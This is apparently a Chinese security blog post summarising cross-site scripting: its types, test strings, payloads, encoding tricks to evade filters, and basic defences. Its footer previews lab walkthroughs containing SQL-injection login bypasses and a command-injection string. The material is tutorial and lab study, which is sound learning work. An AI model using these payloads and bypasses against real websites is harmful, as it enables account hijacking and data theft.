xss漏洞详解
对于xss漏洞一些基本的总结~~
00x1 xss分类
1、反射型
反射型 XSS,非持久化,需要欺骗用户自己去点击链接才能触发 XSS 代码
2、存储型
存储型 XSS,持久化,代码是存储在服务器中的数据库里,如在个人信息或发表文章等地方,可以插入代码,如果插入的数据没有过滤或过滤不严,那么这些恶意代码没有经过过滤将储存到数据库中,用户访问该页面的时候,没有进行编码过滤输出到浏览器上,就会触发代码执行,造成 xss 攻击。
3、DOM型
DOM,全称 Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。DOM 型 XSS 其实是一种特殊类型的反射型 XSS,它是基于 DOM 文档对象模型的。
00x2 xss测试语句
在测试时,应该输入一些标签如<、>输入后查看网页源代码是否过滤标签,如果没过滤,很大可能存在 xss 漏洞。
1、常用的测试语句
1 | <h5>1</h5> |
2、 闭合
1 | "><span>x</span><" |
3、单行注释
1 | "><span>x</span>// |
00x3 常见payload
1 | 1、<script>标签 |
00x4 xss编码绕过
1、gpc过滤字符
如果 gpc 开启的时候,特殊字符会被加上斜杠即,’变成' 所以xss 攻击代码不要带用单引号或双引号。
2、过滤alert
当页面过滤掉alert时,使用不出现alert的语句即可,例:
1 | <script>prompt(/xss/);</script> |
3、过滤标签
● 在程序里如果使用 html 实体过滤,如在 php 会使用 htmlspecialchars()对输入的字符进行实体化,实体化之后的字符不会在 html 执行。
● 就不使用一些实体,如< > ‘ “ &等,如:
1 | onclick="javascript:alert(/xss/); |
4、ascii编码
1 | <script>alert(String.fromCharCode(88,83,83))</script> |
5、url编码
1 | <a href="javascript:%61%6c%65%72%74%28%32%29">123</a> |
6、js编码
● 八进制编码
1 | <script>eval("\141\154\145\162\164\50\61\51");</script> |
● 十六进制编码
1 | <script>eval("\x61\x6c\x65\x72\x74\x28\x31\x29")</script> |
● jsunicode 编码
1 | <script>\u0061\u006c\u0065\u0072\u0074('xss');</script> |
7、html编码
● 在=后可以解析html编码
● 十进制
1 | <img src=111 onerror="alert(1)" /> |
● 十六进制
<img src="x" onerror="alert(1)" />
8、base64编码
1 | <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">111</a> |
00x5 xss防御
1、在cookie中添加httponly属性
2、输入检查(对客户端和服务端都要做输入的字符中是否有特殊字符的过滤检查)
3、输出检查(使用编码或者转义的方式)
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 echozt!
相关推荐
2022-01-28
xss靶场
前些时间把xss-labs的靶场练习了一下,其实如果想练习靶场的话,可以是从xss先开始的,sqli练习的我还停留在第四关。xss总共20关,还是好理解一点的,下面是我的一些理解。 基本流程:先输入一个payload,然后查看网页源码,先猜想一下,再去查看原php文件,验证猜想或者找到解题的关键。 提供一个直接查看源码的快捷方式:ctrl+U, 或者直接在网址前面输入view-source: (一样的意思)我个人还是喜欢直接按ctrl+U的方式,比较方便。 level 1可以先查看第一关的源码,发现直接将值传递过去了 在level1.php中: 1$str = $_GET["name"]; 直接将键盘的值传送给了后台 payload:1<script>alert('xss')</script> level...
2022-02-26
bodgeit靶场
这两天在学长的引导下,我把bodgeit靶场练习了一下。以下是我练习的一些关卡。 在About Us中的Scoring page中可以查看关卡: 1、利用注入漏洞万能密码登录账号尝试构造万能密码: 1test@thebodgeitstore.com' or '1'='1# 发现登录成功: 可以查看一下源代码,在login.jsp中, 其余两个用户也构造同样的万能密码: 123user1@thebodgeitstore.com' or '1'='1#admin@thebodgeitstore.com' or...
2022-07-07
dvwa靶场
这个靶场是几个月前开始的,然后中间可能因为有各种事情拖沓,还剩了一点,终于把它全部弄完啦,真不容易啊。 前言我把dvwa靶场的三个等级low,medium,high每关都做出了相应的题解,应该看起来会清晰一点。 我这里引用的dvwa靶场是来自https://github.com/digininja/DVWA/archive/master.zip 记得看readme文件,配置好相关环境,然后就可以开始啦。 1、Burte Forcelow使用burp暴力破解,得到账户名密码为:admin/password 然后尝试登录,登录成功 medium和low一样 high和low一样 2、Command Injectionlow执行命令 1127.0.0.1 | hostname 即可得到主机名,可命令执行得到其他敏感信息。 medium和low一样 high执行命令 1127.0.0.1 ||...
2022-04-23
pikachu靶场
今天传的是前一段时间打的pikachu靶场。 咱就是说,前一段时间,我的github被标记成机器人了。百度了一下,然后给那边发了封邮件,来来回回两次才总算弄好。我还不够勤快嘛,还把我标记了呜呜呜。 1、Burte Force(暴力破解)1.1 基于表单的暴力破解用burp暴力破解,截取到包,然后发送给Intruder(测试器),由于用户名和密码都不知道,所以攻击类型选择Clusterbomb(集中炸弹)模式。在payloads中分别载入用户名和密码的字典。 最后发现用户名为admin,密码为123456。 登录成功会出现如下提示: 1.2 验证码绕过(on...
2022-04-08
sqli靶场(1~22关)
又是疯狂打靶场的一天,这个sqli靶场真的好多关,我之前试过打过几关,没有坚持,但万事开头难,总归是慢慢打完了。 前言第一部分就是union联合注入和盲注。 我这里用的sqli靶场是https://github.com/Audi-1/sqli-labs.git sqli-labs 把第一部分打完,你真的就成功一大半了~ union操作符:UNION操作符用于合并两个或多个SELECT语句的结果集。请注意,UNION内部的SELECT语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条SELECT语句中的列的顺序必须相同 注释:默认地,UNION操作符选取不同的值。如果允许重复的值,请使用UNION ALL Limit:Limit是指限定查询的条数。有三种方式: 1方式一:limit 参数1 参数1可从1开始,往后递增,表示要查询几条数据。 例如,limit 1 表示限定查询一条语句。 1方式二:limit...
2022-04-10
sqli靶场(23~37关)
第二部分来啦~~ Less-23 注释符绕过输入1’出现如下报错信息: 1''1'' LIMIT 0,1' at line 1 可猜测源码中可能为’$id’ 当构造id=1’ and ‘1’=’1 时正常,而id=1’ and ‘1’=’1’#或者id=1’ and ‘1’=’1’–+ 时报错,发现是对#和–+等注释符进行了过滤。 注释符绕过只能构造一个单引号来闭合后面的但引号。 利用报错注入:23.1获取数据库用户名123payload:id=1' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '1'='1 23.2获取数据库名123payload:id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1 或者使用: 1id=1' and info() and...